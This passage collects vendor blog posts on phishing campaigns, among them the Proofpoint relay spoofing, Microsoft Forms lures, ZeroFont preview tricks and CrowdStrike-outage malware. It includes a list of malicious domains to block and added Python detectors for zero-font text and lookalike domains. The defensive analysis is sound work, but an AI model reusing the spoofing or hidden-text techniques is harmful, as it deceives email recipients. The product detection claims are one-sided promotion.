Alternatively, they are presented with a too-good-to-be-true offer, and by paying they also enroll in an\r\nongoing subscription involving sizeable monthly charges.\r\nThe way that the attackers got around the checks was to send the emails from an SMTP server on a virtual server\r\nunder their control and to route them through a genuine Office 365 account on an Exchange Online server, then\r\nthrough a domain-specific Proofpoint server which sent the email on to the intended recipient. Since the\r\nProofpoint customers being spoofed had authorized the Proofpoint service to send emails on their behalf as an\r\nallowed email sender, the attackers only had to find a way to send spoofed emails through the Proofpoint relay.\r\nDue to a misconfiguration that allowed Microsoft Office 365 accounts to easily interact with its relay servers, they\r\nwere able to do just that, pass SPF and DKIM checks, and make their fake emails appear to be clean.\r\nThey obtained the MX record for the company being spoofed by querying the domain’s public DNS, then routed\r\nthe email through the correct Proofpoint host that is used to process email for that domain. Since the Proofpoint\r\nserver was tricked into believing that the emails had come from the genuine domains of its customers – such as\r\nNike and Disney – the emails were then forwarded to the intended recipients rather than being quarantined.\r\nSpammers are constantly developing new methods of defeating the best email security solutions and while email\r\nsecurity products can usually block spam and malicious emails, some will be delivered to recipients. This is why it\r\nis important to have layered defenses in place to protect against all phases of the attack. For instance, in this\r\nattack, spam filters were bypassed, but other measures could detect and block this attack. 
For instance, a web filter\r\ncan be used to prevent a user from visiting a phishing website linked in an email, and security awareness training\r\nshould be conducted to teach employees how to identify the signs of phishing, to check the domain of any website\r\nlinked in an email, and to also check the domain when they arrive on any website.\r\nMicrosoft Forms Used in Phishing Campaign Targeting M365 Credentials\r\nby G Hunt | July 31, 2024 | Phishing \u0026 Email Spam\r\nMicrosoft credentials are being targeted in phishing campaigns that abuse Microsoft Forms. Microsoft Forms is a\r\nfeature of Microsoft 365 that is commonly used for creating quizzes and surveys. Microsoft Forms has been used\r\nin the past for phishing campaigns, and Microsoft has implemented phishing protection measures to prevent\r\nabuse, but these campaigns show that those measures are not always effective.\r\nTo increase the probability of the phishing emails being delivered and the recipients responding, threat actors use\r\ncompromised email accounts for the campaigns. If a business email account can be compromised in a phishing\r\nattack, it can be used to send phishing emails internally. Vendor email accounts are often targeted and used to\r\nconduct attacks on their customers. The emails are likely to be delivered as they come from a trusted account,\r\nwhich may even be whitelisted on email security solutions to ensure that their messages are delivered.\r\nIf the recipient clicks the link in the email they are directed to a Microsoft Form, which has an embedded link that\r\nthe user is instructed to click. If the link is clicked, the user is directed to a phishing page where they are asked to\r\nenter their Microsoft 365 credentials. 
If the credentials are entered, they are captured by the attacker and are used\r\nto access their account.\r\nThe initial contact includes messages with a variety of lures, including fake delivery failure notifications, requests\r\nto change passwords, and notifications about shared documents. When the user lands on the form, they are told to\r\nclick a link and fill in a questionnaire; that link then sends the user to a phishing page that appears to be a genuine\r\nlogin page for Microsoft 365 or another company, depending on which credentials are being targeted.\r\nThe attackers make their campaign more realistic by using company logos in the phishing emails and familiar\r\nfavicons in the browser tab on the fake web pages. Since Microsoft Forms is used in this campaign, the URL\r\nprovided in the phishing emails has the format https://forms.office[dot]com, as the forms are on a genuine\r\nMicrosoft Forms domain. Not only does that help to trick the user into thinking the request is genuine, but it also\r\nmakes it much harder for email security solutions to determine that the email is not legitimate, as the\r\nforms.office[dot]com domain is generally trusted and has a high reputation score.\r\nWhen these phishing campaigns are detected, Microsoft takes prompt action to block these scams. Each form has\r\na ‘report abuse’ button, so if the scams are identified by users, Microsoft will be notified and can take action to\r\nshut it down. The problem is that these emails are being sent in huge numbers and there is a considerable window\r\nof opportunity for the attacks. Further, if the attacker’s campaign is detected, they can just set up different web\r\npages and forms and continue.\r\nThese phishing campaigns involve two phases. The first phase involves compromising email accounts to send the\r\ninitial phishing emails. 
An advanced email security solution with sandboxing, URL rewriting, and AI-based\r\ndetection capabilities will help to block this first phase of the attack. Advanced anti-phishing solutions for Office\r\n365 can reduce the number of phishing emails that land in inboxes, even when sent from trusted email accounts.\r\nBanner warnings in emails will help to alert users to potential phishing emails; however, users need to be vigilant\r\nas it may be up to them to spot and report the phishing attempt. That means security awareness training should be\r\nprovided to raise awareness of these types of phishing attempts.\r\nSecurity awareness training should also incorporate phishing simulations, and it is recommended to create\r\nsimulations of phishing attempts using Microsoft Forms. If users fall for the fake Microsoft Forms phishing\r\nattempts, they can be provided with further training and told how they could have identified the scam. If another\r\nMicrosoft Forms phishing attempt is received, they are more likely to be able to identify it for what it is.\r\nTitanHQ can help businesses improve their defenses against phishing through the TitanHQ cybersecurity suite,\r\nwhich includes SpamTitan cloud-based anti-spam service, the PhishTitan anti-phishing solution, and the SafeTitan\r\nsecurity awareness and phishing simulation platform. SpamTitan and PhishTitan have exceptionally high detection\r\nrates with a low false positive rate, and SafeTitan is the only behavior-driven security awareness training platform\r\nthat delivers training in real-time in response to employee mistakes. 
Give the TitanHQ team a call today for more\r\ninformation about these products, you can book a product demonstration to find out more, and all solutions are\r\navailable on a free trial.\r\nDon’t Put Up with Substandard Phishing Protection for M365!\r\nby G Hunt | July 29, 2024 | Phishing \u0026 Email Spam\r\nBusinesses that rely on Microsoft Defender for detecting malware and phishing emails may not be as well\r\nprotected as they think. While Defender performs a reasonable job at blocking malware, spam, and phishing\r\nemails, it lacks the high detection levels of many third-party anti-phishing solutions.\r\nTake malware for example. A study conducted in 2022 by AV-Comparatives found Defender only had a 60.3%\r\noffline detection rate. Fast forward to Q2, 2024, and TitanHQ’s email security suite was put to the test alongside\r\n12 other email security solutions by Virus Bulletin. In the independent tests, TitanHQ had a malware catch rate of\r\n100%.\r\nIn the same round of testing, TitanHQ’s spam filter for Office 365 and the email security suite had a spam catch\r\nrate of over 99.98%, a phishing email catch rate of 99.99%, and was given an overall final score of 99.984, the\r\nsecond highest in the tests. It is possible to configure an email solution to provide maximum protection; however,\r\nthat will be at the expense of an elevated number of false positives – genuine emails that are inadvertently marked\r\nas potentially suspicious and are quarantined until they are released by an administrator. In the tests, TitanHQ had\r\na 0.00% false positive rate, with no genuine emails misclassified.\r\nAnother issue with Microsoft Defender is the exception list, which contains locations such as files, folders, and\r\nprocesses that are never scanned. 
These are used to ensure that legitimate apps are not scanned, to prevent them\r\nfrom being misclassified as malware. The problem is that the exception list lacks security protections, which\r\nmeans it can be accessed internally by all users. Should a device be compromised, a threat actor could access the\r\nexceptions list, identify folders and files that are not scanned, and use those locations to hide malware.\r\nGiven the increasingly dangerous threat environment and the high costs of a cyberattack and data breach,\r\nbusinesses need to ensure they are well-defended, which is why many businesses are choosing to protect their\r\nMicrosoft 365 environments with TitanHQ’s PhishTitan anti-phishing solution.\r\nPhishTitan is a cloud-based, AI-driven solution for Microsoft 365 that integrates seamlessly into M365 to increase\r\nprotection from sophisticated phishing attacks. Rather than replacing Microsoft’s EOP and Defender protections,\r\nPhishTitan augments them and adds next-generation phishing protection, not only ensuring that more threats are\r\nblocked but also giving users easy-to-use remediation capabilities.\r\nPhishTitan adds advanced threat detection capabilities through machine learning and LLM to identify the zero-day\r\nand emerging threats that are missed by Defender. PhishTitan provides real-time protection against phishing links\r\nin emails in addition to checks performed when the email is received. URLs are rewritten for Link Lock protection\r\nwith all links reassessed at the point a user clicks to ensure that URLs that have been made malicious after\r\ndelivery are detected and blocked. 
If the link is detected as malicious, access to that URL will be prevented.\r\nPhishTitan also adds banner notifications to emails to alert users to unsafe content and emails from external\r\nsources, and the auto-remediation feature allows all threats to be instantly removed from the entire mail system,\r\nwith robust cross-tenant features for detection and response for MSPs.\r\nPhishTitan has also been developed to be quick to set up and configure. There is no need to change MX records,\r\nsetup typically takes less than 10 minutes, and the solution is incredibly easy to manage. Why put up with inferior\r\nthreat detection and complex interfaces, when you can improve the Office 365 phishing protection with an easy-to-use anti-phishing solution?\r\nDon’t take our word for it though. Take advantage of the free trial of PhishTitan to see for yourself. Product\r\ndemonstrations can also be arranged on request.\r\nZeroFont Phishing Scam Targets Microsoft 365 Users\r\nby G Hunt | July 27, 2024 | Phishing \u0026 Email Spam\r\nA ZeroFont phishing campaign is being conducted that targets Microsoft 365 users. Rather than using the\r\nZeroFont technique to hide malicious content from anti-spam software, this method aims to trick end users into\r\nthinking the email is genuine and safe.\r\nThe ZeroFont phishing technique was first identified in phishing attempts around five years ago, so it is not a new\r\ntechnique; however, this version uses a novel approach. When an email is sent to a business user, before that email\r\nis delivered it will be subject to various checks by the anti-spam server. The business’s anti-spam solution will\r\nperform reputation checks, scan the email for malware, and analyze the content of the email to search for signs of\r\nspam or phishing. 
Only if those checks are passed will the message be delivered to the end user. ZeroFont is a\r\ntechnique for hiding certain words from email security solutions to ensure that the messages are not flagged as\r\nspam and are delivered.\r\nAccording to Check Point, Microsoft is the most commonly impersonated brand in phishing emails. If a threat\r\nactor impersonates Microsoft, they obviously cannot send the email from the Microsoft domain as they do not\r\nhave access. Spam filters will check to make sure that the domain from which the email is sent matches the\r\nsignature, and if there is no match, that is a strong signal that the email is not genuine. With ZeroFont, the\r\nsignature used would only display Microsoft to the end user, and the spam filter is presented with a nonsensical\r\nstring of text. The user would not see that text as the padding text around the word Microsoft is set to a font size of\r\nzero, which means the text is machine-readable but cannot be seen by the user.\r\nA recent campaign uses the ZeroFont technique but with a twist. In this campaign, the aim is not to trick a spam\r\nfilter but to instead trick Outlook users. In Outlook, it is possible to configure the mail client with a listing view\r\noption, which will show the user the first lines of text of an email. The problem for phishers is getting Outlook\r\nusers to engage with the messages, which means the messages must be sufficiently compelling so as not to be\r\ndeleted without opening them. This is especially important if the sender of the email is not known to the recipient.\r\nThe email was detected by Jan Kopriva, who noticed that ZeroFont was used to make the message appear\r\ntrustworthy by displaying text indicating the message had been scanned and secured by the email security\r\nsolution, rather than showing the first lines of visible content of the message. This was achieved by using a zero\r\nfont size for some of the text. 
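Both ZeroFont variants described above rest on the same gap: a mail client's preview or a filter's text extractor reads every text node, while the rendered message shows only those with a non-zero font size. A detector therefore has to split the body into "what the user sees" and "what the machine reads" and flag any difference. The following is an added illustration of that split, not code from the original post, from Jan Kopriva's analysis, or from TitanHQ. It assumes the email body is HTML and that the hidden text is produced by an inline font-size:0 style (the common form); the two sample bodies are constructed.

```python
import re
from html.parser import HTMLParser

# Constructed sample bodies (not a real phishing email). The first hides a
# reassuring line in a zero-size font ahead of the visible text, so a
# listing/preview view shows it while the opened message does not.
ZEROFONT_BODY = """\
<html><body>
<span style="font-size:0px">Scanned and secured by Example Email Security. No threats detected.</span>
<p>Hi, we have a job opening that matches your profile. Reply with your full name,
address and phone number to apply.</p>
<p>Regards,<br>Recruiting</p>
</body></html>
"""

CLEAN_BODY = """\
<html><body>
<p>Hi, the agenda for Tuesday is attached.</p>
<p>Regards,<br>Alice</p>
</body></html>
"""

FONT_SIZE_RE = re.compile(r"font-size\s*:\s*([0-9.]+)\s*(px|pt|em|rem|%)?", re.I)
# Elements that never get a closing tag; tracking them would unbalance the stack.
VOID_TAGS = {"br", "img", "hr", "input", "meta", "link", "area", "base",
             "col", "embed", "source", "track", "wbr"}


def hides_text(style: str) -> bool:
    """True for an inline style that sets font-size to exactly zero.
    Raise the threshold (e.g. below 1px) to also catch near-invisible text."""
    m = FONT_SIZE_RE.search(style or "")
    return bool(m) and float(m.group(1)) == 0.0


class ZeroFontScanner(HTMLParser):
    """Collects text runs in document order, tagging each as visible or hidden."""

    def __init__(self):
        super().__init__()
        self.stack = []   # one flag per open element: does it hide its text?
        self.runs = []    # (hidden: bool, text) in document order

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:
            return
        self.stack.append(hides_text(dict(attrs).get("style", "")))

    def handle_startendtag(self, tag, attrs):
        pass  # <br/>-style tags contain no text; keep the stack balanced

    def handle_endtag(self, tag):
        if tag not in VOID_TAGS and self.stack:
            self.stack.pop()

    def handle_data(self, data):
        text = " ".join(data.split())
        if text:
            # Text is hidden if any enclosing element has font-size:0.
            self.runs.append((any(self.stack), text))


def scan_zero_font(html: str) -> dict:
    """Return what a user would see, what a machine reads, and whether the
    hidden text comes first (the preview-spoofing variant described above)."""
    p = ZeroFontScanner()
    p.feed(html)
    p.close()
    visible = " ".join(t for h, t in p.runs if not h)
    hidden = " ".join(t for h, t in p.runs if h)
    return {
        "visible_text": visible,
        "hidden_text": hidden,
        "has_zero_font": bool(hidden),
        "preview_spoofed": bool(p.runs) and p.runs[0][0],
    }


if __name__ == "__main__":
    for name, body in [("ZEROFONT_BODY", ZEROFONT_BODY), ("CLEAN_BODY", CLEAN_BODY)]:
        result = scan_zero_font(body)
        print(name, {k: v for k, v in result.items() if k != "visible_text"})
```

The report is deliberately two-sided: `hidden_text` is what a filter should run its brand and keyword checks against (the original ZeroFont trick pads the brand name with hidden characters so it never matches), and `preview_spoofed` catches the variant in this post, where the hidden text is placed first so that the listing view shows a reassuring line the opened message never displays. Either finding is a reasonable reason to quarantine or to add a banner warning.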
The threat actor knew that the first lines of the emails are displayed by the mail\r\nclient in the listing view, regardless of the font size, which means if the font is set to zero, the text will be\r\ndisplayed in the listing view but will not be visible to the user in the message body when the email is opened.\r\nThe email impersonated the SANS Technology Institute and used a fake job offer as a lure, asking the user to reply with personal information: full name,\r\naddress, phone number, and personal email address. The full purpose of\r\nthe phishing attempt is not known. There were no malicious links in the email and no malware attached, so the\r\nemail would likely pass through spam filters. If a response is received, the personal information could be used for\r\na spear phishing attempt on the user’s personal email account, which is less likely to have robust spam filtering in\r\nplace, or for a voice phishing attempt, as we have seen in many callback phishing campaigns.\r\nSecurity awareness training programs train employees to look for signs of phishing and other malicious\r\ncommunications, and they are often heavily focused on embedded links in emails and attachments. Emails such as\r\nthis and callback phishing attempts lack the standard malicious content and as such, end users may not identify\r\nthem as phishing attempts. It is important to incorporate phishing emails such as this in security awareness\r\ntraining programs to raise awareness of the threat.\r\nThat is easy with SafeTitan from TitanHQ, as is conducting phishing simulations with these atypical message\r\nformats. SafeTitan includes a huge library of security awareness training content, and the phishing simulator\r\nincludes thousands of phishing templates from real-world phishing attempts. 
It is easy for businesses to create and\r\nautomate comprehensive security awareness training programs for the workforce and provide training on how to\r\nidentify novel techniques such as this when they are identified, to ensure employees are kept up to date on the\r\nlatest tactics, techniques, and procedures used by cybercriminals.\r\nCrowdStrike Phishing and Malware Distribution Scams Mount Following Outage\r\nby G Hunt | July 26, 2024 | Phishing \u0026 Email Spam\r\nCrowdStrike has confirmed that a significant proportion of Windows devices that were rendered inoperable\r\nfollowing a faulty update last Friday have now been restored to full functionality; however, businesses are still\r\nfacing disruption, and many scams run by cybercriminals looking to take advantage have been identified.\r\nOne of those scams involves a fake recovery manual that is being pushed in phishing emails. The emails claim to\r\nprovide a Recovery Tool that fixes the out-of-bounds memory read triggered by the update that caused Windows\r\ndevices to crash and display the blue screen of death. The phishing emails include a document attachment named\r\n“New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm.” The document is a copy\r\nof a Microsoft support bulletin, which claims that a new Microsoft Recovery Tool has been developed that\r\nautomates recovery by deleting the CrowdStrike driver that is causing the crash. The user is prompted to enable\r\ncontent; doing so allows a macro to run that downloads a malicious DLL, which in turn launches the\r\nDaolpu stealer – an information stealer that collects and exfiltrates credentials, login information, and cookies\r\nstored in Chrome and Firefox.\r\nAnother campaign has been identified that capitalizes on the defective Falcon Sensor update. 
The spear phishing\r\ncampaign targeted German firms and attempted to distribute a fake CrowdStrike Crash Reporter installer via a\r\nwebsite that spoofs a legitimate German company. The website was registered a day after the CrowdStrike\r\ndisruptions started. If the user attempts to download the installer by clicking the download button on the website, a\r\nZIP archive is delivered that includes a malicious Inno Setup installer. If executed, the user is shown a fake\r\nCrowdStrike-branded installer. The installer is password-protected to hinder analysis, and the final payload could\r\nnot be determined.\r\nAnother campaign attempts to distribute Lumma information-stealing malware. The campaign uses the domain\r\ncrowdstrike-office365[.]com and tricks the recipient into downloading a fake recovery tool to deal with the boot\r\nloop that prevents Windows devices from booting up. If the downloaded file is executed, it delivers a malware\r\nloader, which will, in turn, deliver the Lumma infostealer.\r\nThese are just three campaigns that use the CrowdStrike outage to deliver malware, all of which use email as the\r\nway to make contact with individuals affected by the outage. Many other campaigns are being conducted and a\r\nlarge number of CrowdStrike-themed domains have been registered since the problems started. 
Other malicious\r\ndomains used in campaigns include the following, all of which should be blocked.\r\ncrowdstrike-helpdesk.com\r\ncrowdstrike.black\r\ncrowdstrikefix.zip\r\ncrowdstrikebluescreen.com\r\ncrashstrike.com\r\nfix-crowdstrike-bsod.com\r\ncrowdstrike-falcon.online\r\ncrowdstrike-bsod.com\r\ncrowdstrikedoomsday.com\r\ncrowdstrikedown.site\r\ncrowdstrikefix.com\r\nisitcrowdstrike.com\r\ncrowdstriketoken.com\r\ncrowdstrike0day.com\r\ncrowdstrikeoutage.com\r\nThese scams are likely to continue for some time, so it is important to remind employees of the high risk of\r\nmalicious emails and warn them to exercise extreme caution with any emails received. Employees should be told\r\nto report any suspicious emails to their security team.\r\nTitanHQ offers a range of cybersecurity solutions to block phishing and malware distribution campaigns, all of\r\nwhich are quick and easy to implement and can protect you in a matter of minutes. They include the WebTitan\r\nweb filter for blocking access to known malicious websites, such as those detailed in this post; the PhishTitan\r\nanti-phishing solution for Office 365; and the SpamTitan corporate email filter for blocking phishing emails. The\r\nlatter incorporates email sandboxing for blocking novel and obfuscated malware threats. 
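A static blocklist such as the one above only catches domains already seen. The Python below, an added example that is not WebTitan or TitanHQ code, turns the pattern in that list into rules: the brand name embedded in a longer label (crowdstrike-helpdesk.com), the exact brand on a TLD the vendor does not use (crowdstrike.black, crowdstrikefix.zip), typosquats one transposition or one dropped letter away from the real domain (the transposed and missing-letter variants seen in other lookalike campaigns; crowdstirke.com and crowdstike.com are constructed here), and partial matches such as crashstrike.com that only share a long fragment and are handed to a human. The brand table, the allowlist and the extra sample domains are assumptions for the example; the rest of the input is the list from the post.

```python
"""Triage candidate domains against a protected brand: block, review or allow.

Added example, not WebTitan/TitanHQ code. Brand table, allowlist and the
extra sample domains are assumptions; the post's own list is the main input.
"""

# Assumption: the legitimate registrable domains for each protected brand.
PROTECTED = {"crowdstrike": {"crowdstrike.com"}}
TYPO_MAX_DISTANCE = 2      # edits allowed before a label counts as a typosquat
MIN_BRAND_LEN = 6          # skip the distance rule for short brands (too many false hits)
MIN_SHARED_FRAGMENT = 6    # longest shared run of characters that earns a manual review


def osa_distance(a, b):
    """Optimal string alignment distance: insert, delete, substitute, or swap two
    adjacent characters, each at cost 1. The swap is what catches crowdstirke."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def longest_common_substring(a, b):
    """Length of the longest run of characters shared by a and b."""
    best, prev = 0, [0] * (len(b) + 1)
    for i in range(1, len(a) + 1):
        cur = [0] * (len(b) + 1)
        for j in range(1, len(b) + 1):
            if a[i - 1] == b[j - 1]:
                cur[j] = prev[j - 1] + 1
                best = max(best, cur[j])
        prev = cur
    return best


def normalize(domain):
    """Lower-case, strip a trailing dot and undo the common [.] defanging."""
    return domain.strip().lower().replace("[.]", ".").rstrip(".")


def classify(domain, protected=PROTECTED):
    """Return (verdict, reason) where verdict is 'block', 'review' or 'allow'.
    Simplification: the registrable label is taken as the second-last DNS label,
    so ccSLDs such as example.co.uk are not handled here."""
    domain = normalize(domain)
    labels = domain.split(".")
    name, tld = (labels[-2], labels[-1]) if len(labels) >= 2 else (domain, "")
    registrable = f"{name}.{tld}" if tld else name
    for brand, legit in protected.items():
        if registrable in legit:
            return "allow", f"legitimate {brand} domain"
        if brand in name:
            if name == brand:
                return "block", f"brand '{brand}' on unexpected TLD .{tld}"
            return "block", f"brand '{brand}' embedded in label '{name}'"
        if len(brand) >= MIN_BRAND_LEN:
            dist = osa_distance(name, brand)
            if dist <= TYPO_MAX_DISTANCE:
                return "block", f"typosquat of '{brand}' (edit distance {dist})"
        if longest_common_substring(name, brand) >= MIN_SHARED_FRAGMENT:
            return "review", f"shares a long fragment with '{brand}'"
    return "allow", "no protected brand matched"


def triage(domains):
    """Group a list of candidate domains by verdict."""
    out = {"block": [], "review": [], "allow": []}
    for d in domains:
        verdict, reason = classify(d)
        out[verdict].append((normalize(d), reason))
    return out


# Domains listed in the post, plus constructed extras to exercise each rule.
POST_DOMAINS = [
    "crowdstrike-helpdesk.com", "crowdstrike.black", "crowdstrikefix.zip",
    "crowdstrikebluescreen.com", "crashstrike.com", "fix-crowdstrike-bsod.com",
    "crowdstrike-falcon.online", "crowdstrike-bsod.com", "crowdstrikedoomsday.com",
    "crowdstrikedown.site", "crowdstrikefix.com", "isitcrowdstrike.com",
    "crowdstriketoken.com", "crowdstrike0day.com", "crowdstrikeoutage.com",
    "crowdstrike-office365[.]com",
]
EXTRA_DOMAINS = ["crowdstrike.com", "crowdstirke.com", "crowdstike.com", "example.com"]  # constructed

if __name__ == "__main__":
    for verdict, hits in triage(POST_DOMAINS + EXTRA_DOMAINS).items():
        print(verdict.upper())
        for dom, reason in hits:
            print(f"  {dom:32} {reason}")
```

Run against newly registered domain feeds or your DNS logs, the brand-embedding and TLD rules catch everything on the post's list except crashstrike.com, which only the shared-fragment rule flags, and then only for review. That gap is the point: heuristics narrow the stream, but a curated blocklist of confirmed malicious domains is still needed for the ones that share little with the brand string.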
TitanHQ also provides a\r\ncomprehensive security awareness training platform and phishing simulator for improving your human defenses\r\nby raising awareness of cyber threats and providing timely training content on the latest tactics used by\r\ncybercriminals in targeted attacks on employees.\r\nGive the TitanHQ team a call today for further information on improving your defenses, or take advantage of the\r\nfree trial available with all TitanHQ products to get immediate protection.\r\nSurge in Fake Websites and Phishing Related to CrowdStrike Windows Outage\r\nby G Hunt | July 22, 2024 | Phishing \u0026 Email Spam\r\nOn July 19, 2024, Windows workstations and servers were disabled as a result of a bug in a software update for\r\nCrowdStrike Falcon Sensor. When the update was installed on Windows devices, it caused them to show the Blue\r\nScreen of Death or get stuck in a boot loop, rendering the devices unusable. Microsoft revealed that its telemetry\r\nshowed 8.5 million Windows devices had been affected; the faulty update was available for around 78 minutes before it was reverted.\r\nThe CrowdStrike Falcon platform is a cybersecurity solution that incorporates anti-virus protection, endpoint detection\r\nand response, threat intelligence, threat hunting, and security hygiene, and it is used by many large businesses\r\naround the world, including around half of Fortune 500 firms. The disruption caused by the update has been\r\ncolossal. Airlines had to ground flights, airports were unable to check people in, healthcare providers were unable\r\nto access electronic patient records and had to cancel appointments and surgeries, financial institutions faced\r\nmajor disruption, and some media companies were unable to broadcast live television for hours. 
Even\r\norganizations that did not use the Falcon product were adversely affected if any of their vendors used the product.\r\nThe incident has been called the worst-ever IT outage, with huge financial implications.\r\nIt did not take long for cybercriminals to take advantage of the chaos. Within hours, cybercriminals were\r\nregistering fake websites impersonating CrowdStrike and offering help fixing the problem, and newly registered domains were\r\nbeing used in phishing campaigns promising a rapid resolution. Given the huge financial\r\nimpact of suddenly not having access to any Windows devices, there was a pressing need for a rapid resolution,\r\nbut the fixes being touted by cybercriminals involved downloading fake updates and hotfixes that installed\r\nmalware.\r\nThose fake updates are being used to deliver a range of different malware types including malware loaders, remote\r\naccess Trojans, data wipers, and information stealers, while the phishing campaigns direct users to websites where\r\nthey are prompted to enter their credentials, which are captured and used to access accounts. Cybercriminals have\r\nbeen posing as tech specialists and independent researchers and have been using deepfake videos and voice calls\r\nto get users to unwittingly grant them access to their devices, disclose their passwords, or divulge other sensitive\r\ncodes.\r\nCrowdStrike has issued a fix and provided instructions for resolving the issue, but those instructions require each\r\naffected device to be manually fixed. The fix was rolled out rapidly, but CrowdStrike CEO George Kurtz said it\r\nwill likely take some time for a full recovery for all affected users, creating a sizeable window of opportunity for\r\nthreat actors. 
Due to the surge in criminal activity related to the outage, everyone should remain vigilant and\r\nverify the authenticity of any communications, including emails, text messages, and telephone calls, and only rely\r\non trusted sources for guidance. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has reminded\r\nall organizations of the importance of having robust cybersecurity measures in place to protect their users, assets,\r\nand data, and to remind all employees to avoid opening suspicious emails or clicking on unverified links in\r\nemails.\r\nIt is important to have multiple layers of security protection to identify, detect, and avoid these attacks, including\r\nAI-driven phishing protection, web filtering to block access to malicious websites, anti-virus software to detect\r\nand neutralize malware, and security awareness training for employees. TitanHQ can help to secure your business\r\nin all of these areas and offers a cloud-based spam filtering service (SpamTitan) which includes email sandboxing\r\nand an email antivirus filter, phishing protection for Office 365 (PhishTitan), and the SafeTitan security awareness\r\ntraining and phishing simulator.\r\nMalicious Email Campaign Delivers a Malware Cluster Bomb of Up to 10 Viruses\r\nby G Hunt | June 30, 2024 | Phishing \u0026 Email Spam\r\nMany malware infections start with a malicious email that contains a file attachment with a malicious script that\r\ndownloads malware if executed. One response to a single email is all it takes to infect the user’s device with\r\nmalware, which may be able to spread across the network or at least provide the threat actor with the foothold they\r\nneed in the network for follow-on activities. There is a much worse scenario, however. 
Rather than a single user\r\ninfecting the network with one malware variant, that single response to the malicious email results in multiple\r\nmalware infections. One campaign has been identified that does just that. A malware cluster bomb is delivered that\r\ncan infect the user’s device with up to 10 different malware variants.\r\nThe campaign was identified by researchers at KrakenLabs and has been attributed to a threat actor known as\r\nUnfurling Hemlock. The campaign is being conducted globally with at least 10 countries known to have been\r\nattacked, although most of the victims have so far been located in the United States. The campaign has been\r\nrunning since at least February 2024 and uses two methods to deliver the malware variants – malicious emails and\r\nmalware loaders installed by other threat groups. The threat actor has already distributed hundreds of thousands of\r\nmalicious files in the 5 months since the operation is believed to have commenced.\r\nIn the email campaign conducted by Unfurling Hemlock, the victim is tricked into downloading a file called\r\nWExtract.exe which contains nested cabinet files, each containing a different malware variant. If the file is\r\nexecuted, the malware is extracted in sequence, and each malware variant is executed in reverse order, starting\r\nwith the last malware variant to be extracted. Each malware cluster bomb has between four and seven stages, with\r\nsome of those stages delivering multiple malware variants.\r\nThe malware variants delivered vary, but they consist of information stealers, backdoors, malware loaders, and\r\nbotnets. The information stealers include Redline Stealer, Mystic Stealer, and RisePro, and the malware loaders include\r\nAmadey and SmokeLoader. 
Other malware variants are used to disable security solutions such as Windows\r\nDefender, obfuscate and hide malware payloads, gather system information, and report on the\r\nstatus of the malware infections.\r\nIt is not clear how the threat actor is using these malware infections. They could be delivering malware for other\r\nthreat actors and selling the access, using the malware to harvest credentials to sell on the darkweb, conducting\r\ntheir own attacks using whatever malware variant serves their purpose, or a combination of the three. What the\r\nattack does ensure is maximum flexibility, as there are high levels of redundancy to ensure that if some of the\r\nmalware variants are detected, some are likely to remain.\r\nThe delivery of multiple malware variants means this campaign could be highly damaging, but it also increases\r\nthe chance of detection. While antivirus software is a must and may detect some of the malware variants, others\r\nare likely to go undetected. The key to blocking attacks is to prevent the initial phishing emails from reaching end\r\nusers and to provide training to the workforce to help with the identification and avoidance of these malicious\r\nemails.\r\nMany email security solutions rely on antivirus engines to detect malware, but cybercriminals are skilled at\r\nbypassing these signature-based defenses. TitanHQ’s SpamTitan anti-spam software uses dual\r\nantivirus engines as part of the initial checks but also email sandboxing for behavioral analysis. Suspicious emails\r\nare sent to the sandbox where files are unpacked and their behavior is analyzed in depth. 
The behavioral analysis\r\nidentifies malicious actions, resulting in the messages being quarantined for further analysis by the security team.\r\nSpamTitan also includes AI and machine-learning algorithms to check how messages deviate from the emails\r\ntypically received and can identify new threats that have previously not been seen. SpamTitan is a highly effective\r\nMicrosoft 365 spam filter and can be provided as a gateway spam filter or a cloud-based anti-spam service.\r\nEnd user training is an important extra layer of security that helps eradicate bad security practices and teaches\r\nemployees how to recognize and avoid malicious emails. Should a malicious email bypass email security defenses,\r\ntrained employees will be more likely to recognize and report the threat to the security team. Training data from\r\nSafeTitan, TitanHQ’s security awareness training platform and phishing simulator, shows that training and\r\nphishing simulations can reduce susceptibility to email attacks by up to 80% when provided regularly throughout\r\nthe year.\r\nGive the TitanHQ sales team a call today for more information on these and other cybersecurity solutions to\r\nimprove your defenses against the full range of cyber threats.\r\nA Cost-Effective Way to Improve Office 365 Email Filtering\r\nby G Hunt | June 29, 2024 | Phishing \u0026 Email Spam, Spam Advice\r\nAround 40% of businesses use Office 365 for email, and standard licenses include Exchange Online Protection (EOP) for blocking spam and other email threats. While EOP will block a substantial amount of\r\nunwanted spam emails and malicious emails, the level of protection provided falls well below what many\r\nbusinesses need as too many threats pass through undetected.\r\nBusinesses can opt for a more expensive Business Premium license to improve Microsoft’s spam filter for Office\r\n365, as this license includes Defender for Office 365. 
Alternatively, businesses can pay for Defender as an add-on.\r\nWhile Defender improves the phishing detection rate, this security feature only adds a little extra protection to\r\nEOP, and many malicious emails still go undetected. The E5 license provides the greatest amount of protection but\r\nit is prohibitively expensive for many businesses, and even this license does not give you cutting-edge protection.\r\nFortunately, there is a way to improve Office 365 email filtering that will provide you with excellent protection\r\nagainst phishing, malware, spam, and other email threats without having to cover the cost of expensive licenses\r\nand add-ons. That solution is to use a third-party email security solution that augments the spam filter for Office\r\n365 regardless of the license you have. Many businesses prefer to use a third-party solution rather than placing all\r\nof their trust in Microsoft – a company that has recently struggled with preventing hackers from compromising its\r\nown systems.\r\nSpamTitan from TitanHQ is a cloud-based email security solution that integrates seamlessly with Office 365 to\r\ngreatly increase protection against email threats such as phishing, business email compromise, malware, and data\r\ntheft by insiders, and is easy to set up, configure, and manage.\r\nThere are several features of SpamTitan that are lacking in Microsoft’s security solutions. In addition to\r\nperforming reputation checks and blocking known malicious email addresses and domains, SpamTitan uses\r\npredictive techniques for detecting spam and phishing emails, such as Bayesian analysis, machine learning, 